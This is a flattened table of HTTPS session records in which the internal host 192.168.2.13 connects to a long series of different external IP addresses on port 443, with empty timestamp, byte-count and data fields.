
                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15938192.168.2.133994676.14.177.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15939192.168.2.133658288.217.39.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15940192.168.2.1354284212.31.19.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15941192.168.2.1344318105.39.163.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15942192.168.2.1333066113.193.165.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15943192.168.2.1346304114.26.155.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15944192.168.2.1357280194.227.239.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15945192.168.2.133950861.84.254.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15946192.168.2.1344050221.116.64.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15947192.168.2.1357766102.118.31.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15948192.168.2.133829483.217.2.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15949192.168.2.135840842.14.3.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15950192.168.2.1351026205.145.230.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15951192.168.2.1352566211.17.181.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15952192.168.2.1346096199.165.24.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15953192.168.2.133477072.142.19.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15954192.168.2.134457893.26.82.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15955192.168.2.134475223.248.60.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15956192.168.2.134751836.227.118.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15957192.168.2.1340072212.191.228.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15958192.168.2.1335492117.173.130.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15959192.168.2.1341484165.111.130.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15960192.168.2.13530861.17.193.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15961192.168.2.1345310194.232.88.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15962192.168.2.1349878117.69.183.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15963192.168.2.134598844.1.208.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15964192.168.2.13443649.53.176.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15965192.168.2.134751469.82.173.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15966192.168.2.1344320159.132.116.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15967192.168.2.135339084.226.110.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15968192.168.2.1355642173.106.225.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15969192.168.2.1339770205.60.210.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15970192.168.2.1347612180.3.16.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15971192.168.2.134069088.40.51.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15972192.168.2.1337360141.98.146.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15973192.168.2.1348096101.226.76.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15974192.168.2.13459961.194.78.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15975192.168.2.1347090156.118.127.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15976192.168.2.1335578120.140.239.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15977192.168.2.1335848164.195.244.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15978192.168.2.1345782178.87.73.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15979192.168.2.135854236.13.200.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15980192.168.2.1333936117.236.238.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15981192.168.2.13429002.131.60.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15982192.168.2.135412217.20.213.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15983192.168.2.134781240.30.101.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15984192.168.2.1345316166.183.26.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15985192.168.2.1337740187.15.136.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15986192.168.2.134662667.164.245.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15987192.168.2.1359928199.192.96.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15988192.168.2.1339028156.181.131.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15989192.168.2.1336062211.137.134.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15990192.168.2.134904072.49.147.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15991192.168.2.134395245.152.95.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15992192.168.2.1348480156.94.225.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15993192.168.2.133643847.86.198.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15994192.168.2.1341582140.197.164.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15995192.168.2.1344144147.214.6.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15996192.168.2.1360252197.247.216.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15997192.168.2.134776835.5.216.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15998192.168.2.1339278126.46.149.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15999192.168.2.134722870.241.170.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16000192.168.2.13584388.154.62.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16001192.168.2.1338360185.25.141.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16002192.168.2.1332960189.14.44.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16003192.168.2.133791257.89.191.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16004192.168.2.134824883.22.230.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16005192.168.2.1339682103.111.5.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16006192.168.2.1347912122.0.34.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16007192.168.2.133296473.88.148.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16008192.168.2.134510689.154.44.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16009192.168.2.135125661.159.27.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16010192.168.2.135024288.247.142.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16011192.168.2.135912825.167.176.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16012192.168.2.133932475.66.252.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16013192.168.2.1337754171.141.60.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16014192.168.2.1344328201.66.175.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16015192.168.2.134415663.35.231.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16016192.168.2.1353444158.60.76.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16017192.168.2.1350196157.231.117.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16018192.168.2.1334058202.159.115.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16019192.168.2.1336636164.114.112.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16020192.168.2.1357964185.99.238.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16021192.168.2.1343176184.13.105.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16022192.168.2.1353670183.177.239.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16023192.168.2.1357876103.110.201.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16024192.168.2.1356096134.247.210.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16025192.168.2.1349564196.221.20.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16026192.168.2.134745247.245.22.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16027192.168.2.134491278.138.202.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16028192.168.2.1347560174.210.220.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16029192.168.2.134063034.107.114.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16030192.168.2.1348142223.1.140.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16031192.168.2.133857247.106.45.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16032192.168.2.135139499.183.224.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16033192.168.2.1343180212.153.129.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16034192.168.2.1345624142.2.158.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16035192.168.2.135384052.187.44.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16036192.168.2.135106814.255.52.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16037192.168.2.135442686.41.3.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16038192.168.2.1349274202.49.242.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16039192.168.2.134989887.155.86.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16040192.168.2.134834241.78.197.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16041192.168.2.133329823.141.175.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16042192.168.2.134494272.205.67.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16043192.168.2.1360444135.30.56.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16044192.168.2.133856057.101.10.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16045192.168.2.133551454.27.56.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16046192.168.2.1345954191.28.90.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16047192.168.2.13509124.180.123.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16048192.168.2.135825636.21.244.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16049192.168.2.135925288.195.184.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16050192.168.2.1346628125.192.97.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16051192.168.2.1355044198.146.197.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16052192.168.2.134260882.12.124.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16053192.168.2.1359380173.193.74.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16054192.168.2.1339308150.255.104.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16055192.168.2.1356456182.215.198.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16056192.168.2.135496644.106.248.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16057192.168.2.1340510136.40.33.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16058192.168.2.1332768111.12.91.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16059192.168.2.1348782160.179.71.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16060192.168.2.135815454.36.250.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16061192.168.2.135197043.222.85.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16062192.168.2.133297884.27.92.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16063192.168.2.134624268.93.227.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16064192.168.2.1336860173.82.68.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16065192.168.2.1344840185.168.53.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16066192.168.2.135505684.171.170.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16067192.168.2.1334854131.253.252.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16068192.168.2.1334664109.33.247.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16069192.168.2.1355208174.234.152.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16070192.168.2.134744413.192.161.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16071192.168.2.1346444148.39.173.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16072192.168.2.135011495.245.43.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16073192.168.2.1343958108.166.216.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16074192.168.2.1353390180.41.119.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16075192.168.2.13578481.9.53.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16076192.168.2.1356100103.185.74.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16077192.168.2.134868074.245.242.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16078192.168.2.1334978145.250.123.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16079192.168.2.1338220221.81.194.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16080192.168.2.134720017.36.93.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16081192.168.2.1349162171.101.241.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16082192.168.2.1348404132.153.11.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16083192.168.2.13479121.77.220.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16084192.168.2.1360130199.26.230.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16085192.168.2.1337156191.107.160.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16086192.168.2.134306686.231.163.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16087192.168.2.135234485.70.237.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16088192.168.2.1348000163.133.212.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16089192.168.2.1357758174.119.149.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16090192.168.2.135057292.243.50.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16091192.168.2.1349968187.19.119.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16092192.168.2.134890049.79.31.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16093192.168.2.135844247.112.17.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16094192.168.2.1349840153.29.26.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16095192.168.2.1351958145.126.42.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16096192.168.2.1355746126.172.30.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16097192.168.2.1356050158.78.196.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16098192.168.2.133926677.240.23.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16099192.168.2.1356624142.207.185.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16100192.168.2.1350000143.21.255.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16101192.168.2.1335572200.136.31.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16102192.168.2.133859469.33.219.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16103192.168.2.13385702.249.237.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16104192.168.2.1339500190.204.198.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16105192.168.2.1340040208.22.156.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16106192.168.2.135250682.22.65.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16107192.168.2.135577451.61.163.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16108192.168.2.1333902200.154.81.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16109192.168.2.1349234185.201.180.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16110192.168.2.1339476129.244.120.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16111192.168.2.133720040.159.1.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16112192.168.2.134145298.222.173.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16113192.168.2.135721847.106.194.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16114192.168.2.135118417.9.202.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16115192.168.2.1354532137.33.96.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16116192.168.2.136010040.53.251.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16117192.168.2.133946892.59.123.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16118192.168.2.1348678179.169.40.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16119192.168.2.133977076.125.11.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16120192.168.2.13353201.216.180.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16121192.168.2.133382687.235.61.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16122192.168.2.1350592216.30.20.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16123192.168.2.1350326141.215.110.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16124192.168.2.133518665.180.131.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16125192.168.2.135243627.76.58.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16126192.168.2.1342826148.98.8.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16127192.168.2.134685069.6.218.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16128192.168.2.1340246117.218.87.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16129192.168.2.133837681.46.132.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16130192.168.2.134565627.93.232.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16131192.168.2.135399658.208.182.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16132192.168.2.1349142206.93.246.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16133192.168.2.1350624182.2.125.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16134192.168.2.1360300114.71.28.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16135192.168.2.1336744132.148.75.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16136192.168.2.135841098.28.135.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16137192.168.2.1336808130.105.28.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16138192.168.2.133509676.252.142.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16139192.168.2.1351592196.0.44.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16140192.168.2.1334998166.229.124.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16141192.168.2.1359420101.79.253.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16142192.168.2.1341656213.28.129.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16143192.168.2.1356242183.109.214.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16144192.168.2.1359488102.3.66.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16145192.168.2.133426466.20.192.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16146192.168.2.1348384138.5.31.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16147192.168.2.135395614.197.44.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16148192.168.2.1356870217.5.99.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16149192.168.2.1352132186.17.153.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16150192.168.2.133398419.164.217.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16151192.168.2.135206024.18.51.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16152192.168.2.1339946192.116.93.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16153192.168.2.1339180180.12.60.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16154192.168.2.1350272189.92.150.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16155192.168.2.134313085.86.151.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16156192.168.2.133662682.166.251.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16157192.168.2.1333824204.3.178.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16158192.168.2.1354000170.5.71.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16159192.168.2.1335858141.45.235.140443
                                        TimestampBytes transferredDirectionData


